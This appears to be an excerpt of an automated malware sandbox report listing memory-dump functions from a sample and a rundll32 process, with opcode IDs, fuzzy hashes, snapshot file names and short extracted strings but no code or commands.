                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9389bf65d919274a33a557557ec0f7f160a128a389273795622e409b83274f9c
                                                                                                                                                                      • Instruction ID: a337b134acd59815e4b86f78ff85368ec63acb6902fb2ba90aeb439b010159e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 9389bf65d919274a33a557557ec0f7f160a128a389273795622e409b83274f9c
                                                                                                                                                                      • Instruction Fuzzy Hash: 15014FB5D043069FD754DFAD9C856AD7BB0AB04320F24895AD114D73A2D37086868F91
                                                                                                                                                                      Function 016B18D8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9354bd1538a3fa1508815f0b5957580352a224ed69ca45523e4950265d5b850c
                                                                                                                                                                      • Instruction ID: e304f7d7a1b2e3646f484007edfe2eba047340aef2e258e8f49014220e0e2b3a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9354bd1538a3fa1508815f0b5957580352a224ed69ca45523e4950265d5b850c
                                                                                                                                                                      • Instruction Fuzzy Hash: D1F0A7313106059F8716AB3EB9589DFB79AEBC6250310903DD469D7310DF35ED468BD1
                                                                                                                                                                      Function 016BBEC0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 86d147509597c3143caf67e74f740a70c60c2221cf7c601246740d5891053abc
                                                                                                                                                                      • Instruction ID: 16e2f34edfacc6051530c7849f5d4929433cde82607aa8785667dc60df763396
                                                                                                                                                                      • Opcode Fuzzy Hash: 86d147509597c3143caf67e74f740a70c60c2221cf7c601246740d5891053abc
                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF030B0D0021ADFDB54DFADD8856AEBBF4EB04320F244659D524E73A1D77185818F91
                                                                                                                                                                      Function 016BBF29 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ed3388b569935e02fc5f9e5e7f5b36879ec74c781f5b1d1a4a7792261960b37d
                                                                                                                                                                      • Instruction ID: 0bf6ebb137861d6b46a3985d9f83497936398ef86857f126c6b591e74903cb58
                                                                                                                                                                      • Opcode Fuzzy Hash: ed3388b569935e02fc5f9e5e7f5b36879ec74c781f5b1d1a4a7792261960b37d
                                                                                                                                                                      • Instruction Fuzzy Hash: 50F05E70D0021ADFCB40DFADDD856AEBFF4AB05320F94056AE114E3381D77585818F81
                                                                                                                                                                      Function 016BBF38 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 552f0e63a9907a9ee880a9f054321e9d921c1c16e17628026b31fd55465f5404
                                                                                                                                                                      • Instruction ID: 683e9d111e7be75b33efd2efcf8152b22d314fd6f2752a5efcf4bc063452c900
                                                                                                                                                                      • Opcode Fuzzy Hash: 552f0e63a9907a9ee880a9f054321e9d921c1c16e17628026b31fd55465f5404
                                                                                                                                                                      • Instruction Fuzzy Hash: 1DF01C70D04209DFCB50DFADD9856AEBFF4AB08210F50469AE518E3391D77186818FC1
                                                                                                                                                                      Function 016BD708 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 60c1552565ce0fd6754d46b9835c45f09271c5640de77e099b47a376f711ffcd
                                                                                                                                                                      • Instruction ID: bc70b93e7973ef4e50c529553becf38187376defa646a57863f79f631e6b0bef
                                                                                                                                                                      • Opcode Fuzzy Hash: 60c1552565ce0fd6754d46b9835c45f09271c5640de77e099b47a376f711ffcd
                                                                                                                                                                      • Instruction Fuzzy Hash: D5E0ED34D0130CAFCB44DFA8E48569DBBB4EB88310F0045AAE808D7320DB345A44CF80
                                                                                                                                                                      Function 016B5910 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 79acbefdc4a22a29b0151062977e2f696945ffdf9fd7fd91a51a7ca8fadc0f09
                                                                                                                                                                      • Instruction ID: 84e5967acf1a237a6b016ec9f13b30517b87a4c0774e8367961adccc3ced3f62
                                                                                                                                                                      • Opcode Fuzzy Hash: 79acbefdc4a22a29b0151062977e2f696945ffdf9fd7fd91a51a7ca8fadc0f09
                                                                                                                                                                      • Instruction Fuzzy Hash: A3E04870905388FFCB01EBA4D98169DBFB5DF4625470540A5E804E7312E6315F559751
                                                                                                                                                                      Function 016B597C Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 81a05feb9c809180b6d64b8de31095fbb26fcb4f19f45e25cd87735aff054a52
                                                                                                                                                                      • Instruction ID: 47cb278a9b38153ebbcf96b6d6769c7c96029d0b31ee8d19ab718f5d1815cc2e
                                                                                                                                                                      • Opcode Fuzzy Hash: 81a05feb9c809180b6d64b8de31095fbb26fcb4f19f45e25cd87735aff054a52
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E026628881C4CFE61193AC4DD16E03FA4C42224834801C5D8099B325E222D89AA391
                                                                                                                                                                      Function 016BD718 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dccefef06ad3c12f28c1534f4163c0741ba141b7a7b9f34a42b6fea98ae71df7
                                                                                                                                                                      • Instruction ID: 84228bb5b633705625f1cef3a8b39e3c007832528fce525fbeeba1ff294ebf28
                                                                                                                                                                      • Opcode Fuzzy Hash: dccefef06ad3c12f28c1534f4163c0741ba141b7a7b9f34a42b6fea98ae71df7
                                                                                                                                                                      • Instruction Fuzzy Hash: DBE09274E0520CAFCB44EFA8D94559DBBF5AB88300F0081A9E809A7354EA345A448F81
                                                                                                                                                                      Function 016B0E80 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7bc0ed5ce228adac42806e5ef78886fb174ef2ff5985a5449131a5b64933fa89
                                                                                                                                                                      • Instruction ID: 4fd84965ae63625f9f537db72161ae626f80670b33488df804aa50d3c36f4a6d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7bc0ed5ce228adac42806e5ef78886fb174ef2ff5985a5449131a5b64933fa89
                                                                                                                                                                      • Instruction Fuzzy Hash: CCD0127090120CEFCB00EFA9E95199DF7B9DB44200B1051A8D409E3250DA316F049B50
                                                                                                                                                                      Function 016B5920 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5004a1cd70ac6d0b583854a5eee36999ebea6f5c323048bab63c8c01bbd3853d
                                                                                                                                                                      • Instruction ID: 120fc0f018d263a96baeb99998a5846be7fba9c84fee2e3a195b1eb30eb4a668
                                                                                                                                                                      • Opcode Fuzzy Hash: 5004a1cd70ac6d0b583854a5eee36999ebea6f5c323048bab63c8c01bbd3853d
                                                                                                                                                                      • Instruction Fuzzy Hash: 4AD05B3090510CEFCB00EFF4DA4269EB7F9DB45300B5045A9D408D3300DA326F409790
                                                                                                                                                                      Function 016B19E0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 14e81f6f07c115798f351c7d1f26f8d5e933a1e99de27a30ce527d5f4e789d0e
                                                                                                                                                                      • Instruction ID: dd7a1c5b19952c3d102a8489ce0e4ee34086ba14d59c0fdb38b05c0f37f1f526
                                                                                                                                                                      • Opcode Fuzzy Hash: 14e81f6f07c115798f351c7d1f26f8d5e933a1e99de27a30ce527d5f4e789d0e
                                                                                                                                                                      • Instruction Fuzzy Hash: 76C002B661000067DB04CE30CD66B52A755DB9620DF38C8AAE415DB381DA23E9038644
                                                                                                                                                                      Function 016B9D98 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2bdb0b8815cf822d8df3b166cc5652053a569a11381d0a20f2aee6122d2b9cf0
                                                                                                                                                                      • Instruction ID: c152f857381f52dfa0919d6f10297025c18d23a1a60efac91bac744b6776e532
                                                                                                                                                                      • Opcode Fuzzy Hash: 2bdb0b8815cf822d8df3b166cc5652053a569a11381d0a20f2aee6122d2b9cf0
                                                                                                                                                                      • Instruction Fuzzy Hash: AFC0123101C3854EC70257A8A4569A93F35D91212130543B7A025C54F2CB28898ED305
                                                                                                                                                                      Function 016BD6F0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b5815ac0d755b9f8d2147c29c3e95724a78058cab0bbd1d19def52ca4f5679ee
                                                                                                                                                                      • Instruction ID: 8852bc75330cb5a187c575a93f3f2af58861646f397a09c9751e9f2e8b52842f
                                                                                                                                                                      • Opcode Fuzzy Hash: b5815ac0d755b9f8d2147c29c3e95724a78058cab0bbd1d19def52ca4f5679ee
                                                                                                                                                                      • Instruction Fuzzy Hash: BEB0927094530CAF8620DB99990185ABBACDA0A310F0001D9F90887320D976E91056D1
                                                                                                                                                                      Function 016B9D70 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3d26a3ca282f8cd729c934f7cac543d0b7b52e77da048a51e5a3c8cf8c7ff07a
                                                                                                                                                                      • Instruction ID: 5285d722fb3a3945b4eaf3d3446ecdc739689be7b3e917d1b35b4c125aa3ac72
                                                                                                                                                                      • Opcode Fuzzy Hash: 3d26a3ca282f8cd729c934f7cac543d0b7b52e77da048a51e5a3c8cf8c7ff07a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AC08031418380CFCF008714AD2139D3F20A715334F448765C4B18F1D3D2244445D711
                                                                                                                                                                      Function 016B9DA8 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b7efc81992f2adf41d197bdf390a5324489111c7ca16e21284ab124523fb6905
                                                                                                                                                                      • Instruction ID: 7948999a91d7f886fa7cb564b66b1ead81bd540bef6e869df69bcf0efd0ff301
                                                                                                                                                                      • Opcode Fuzzy Hash: b7efc81992f2adf41d197bdf390a5324489111c7ca16e21284ab124523fb6905
                                                                                                                                                                      • Instruction Fuzzy Hash: 73B0123106871ECFC6406755F405E5C7F6DE5402057400120B10F455359F786CC94688

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 046828B4 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq$LR^q
                                                                                                                                                                      • API String ID: 0-516514815
                                                                                                                                                                      • Opcode ID: 8daa95f02196e959afd642047c23e783f3e88978d627daa4ff572273064d9063
                                                                                                                                                                      • Instruction ID: 36b7ebf31d618f93d99fb2aaf359a1dd9337501cd8db70a10a39c7747c9d01a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 8daa95f02196e959afd642047c23e783f3e88978d627daa4ff572273064d9063
                                                                                                                                                                      • Instruction Fuzzy Hash: 0451F5317002185FDB187A78982437F3BEAEF85704F1485AEE906CB396EE64AC469395
                                                                                                                                                                      Function 04681630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $^q$$^q
                                                                                                                                                                      • API String ID: 0-355816377
                                                                                                                                                                      • Opcode ID: 2d2e6ac9c27c359256a202b1b986d4033ea37b59f8dc63accb4aa960e153bc1b
                                                                                                                                                                      • Instruction ID: 0fbe325309bf5947e03835af11dfa4845dac19759600a680e9723d4ba79d669c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d2e6ac9c27c359256a202b1b986d4033ea37b59f8dc63accb4aa960e153bc1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 5351C131B002099FC714EF78D8505EEBBB6EFCA350B14826EE815DB365EA309D42CB91
                                                                                                                                                                      Function 046850D0 Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $^q$$^q
                                                                                                                                                                      • API String ID: 0-355816377
                                                                                                                                                                      • Opcode ID: 32682696beab302a455d772f9d48ca7fd0f6624c81a44e53136fba2caa4bfdc6
                                                                                                                                                                      • Instruction ID: 563b6e787af3c7f59c0fec3c4daa4d70389398e9765e0949f6ca1d92b8e230c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 32682696beab302a455d772f9d48ca7fd0f6624c81a44e53136fba2caa4bfdc6
                                                                                                                                                                      • Instruction Fuzzy Hash: EA317030A10208EFDB18AF75C8547AE7BE6BF88704F14C529E442AB355EF75AC45CBA1
                                                                                                                                                                      Function 04686508 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
                                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                                      • Opcode ID: 83fe393834ca9d7493dcdb70433e6ea6963a4120d21f193d3f6775178d0957b7
                                                                                                                                                                      • Instruction ID: bde750805a0877d161f29f486ebd10db557ba5122f7c5df6baf25854c3599743
                                                                                                                                                                      • Opcode Fuzzy Hash: 83fe393834ca9d7493dcdb70433e6ea6963a4120d21f193d3f6775178d0957b7
                                                                                                                                                                      • Instruction Fuzzy Hash: 4791C270B10215DFDB14AF64D858BAEBBB2FF88704F10866DE4069B391EB74AC45CB91
                                                                                                                                                                      Function 04681080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                      • Opcode ID: 28bcb791b39fbd20f94b2acd1d0507b6baddabd377ba16228ff332dc54fc4297
                                                                                                                                                                      • Instruction ID: d97390fb8c511862e75b39cbc745ad178184d7dae6631df0e194eb36334540f5
                                                                                                                                                                      • Opcode Fuzzy Hash: 28bcb791b39fbd20f94b2acd1d0507b6baddabd377ba16228ff332dc54fc4297
                                                                                                                                                                      • Instruction Fuzzy Hash: C971A431B002188FDB04AFB9C8546BEB7E7AFC9700F158529E506AB3A5EE71ED439750
                                                                                                                                                                      Function 04682878 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
                                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                                      • Opcode ID: a5a68ab9a79472ab2034a96e908079ff967f89fedd70e06a9baacf93a260b68b
                                                                                                                                                                      • Instruction ID: fc29f19dadb8791009237595bb6a492f0f66754c089ea11be9cfb764df939a0c
                                                                                                                                                                      • Opcode Fuzzy Hash: a5a68ab9a79472ab2034a96e908079ff967f89fedd70e06a9baacf93a260b68b
                                                                                                                                                                      • Instruction Fuzzy Hash: DC3110707046555FDB05AF389C647BE3BBAEF86204F0446AEE405CB2E6FA34980A8794
                                                                                                                                                                      Function 046850BF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $^q
                                                                                                                                                                      • API String ID: 0-388095546
                                                                                                                                                                      • Opcode ID: ba21c190ad309f80af419d95bf55c21ce47bd010fe05985c20bdc6576770ad25
                                                                                                                                                                      • Instruction ID: 5a14d220576f992cc45e6c7435baff90a4ecb360322270ac86cdddf698d58a8e
                                                                                                                                                                      • Opcode Fuzzy Hash: ba21c190ad309f80af419d95bf55c21ce47bd010fe05985c20bdc6576770ad25
                                                                                                                                                                      • Instruction Fuzzy Hash: CA419130A00208EFDB14AF64C8946AABBB6FF89704F148529E442AB351EB75AC46DB50
                                                                                                                                                                      Function 04680C1C Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                      • Opcode ID: 5cf32932b55189b0f2c2f995859c0ab490a816f5c3cb1e71343a7f0655b541dc
                                                                                                                                                                      • Instruction ID: 11f95c5d73c398c2f6db268b4c414e5dff9434e7cd0b6573c226c5385f736eb4
                                                                                                                                                                      • Opcode Fuzzy Hash: 5cf32932b55189b0f2c2f995859c0ab490a816f5c3cb1e71343a7f0655b541dc
                                                                                                                                                                      • Instruction Fuzzy Hash: 4231F7307042485FE7157B7848243BB7BF69F8A304F15856ED506DB396EE746C078792
                                                                                                                                                                      Function 04682D60 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
                                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                                      • Opcode ID: 744ef9c4224e73d1e506f6360e9ae4daff25cb268a1cf16a07fe39d22e855c81
                                                                                                                                                                      • Instruction ID: 5eb347f3e41bf0815debd71c4872d1ff847f12ad1df68bb44712234d73090e0e
                                                                                                                                                                      • Opcode Fuzzy Hash: 744ef9c4224e73d1e506f6360e9ae4daff25cb268a1cf16a07fe39d22e855c81
                                                                                                                                                                      • Instruction Fuzzy Hash: 4421F171B005155FDB18AF24986877F7BEAEFC4704F1486AEE406C73A5FB30A8068754
                                                                                                                                                                      Function 046828C4 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                      • Opcode ID: 09eef664b773d470301763e3dc2942276d6c62e2e5642925ae4382400e8a2be0
                                                                                                                                                                      • Instruction ID: 7e5f6b1f5186f2f6f91aa4aca28084f770e2b8ab13aafda8c0a361970ebc1a93
                                                                                                                                                                      • Opcode Fuzzy Hash: 09eef664b773d470301763e3dc2942276d6c62e2e5642925ae4382400e8a2be0
                                                                                                                                                                      • Instruction Fuzzy Hash: 042144717043189BC7153A26585027F3B9AEFD2310F08812EE906873A2ED34A805D365
                                                                                                                                                                      Function 04688A31 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
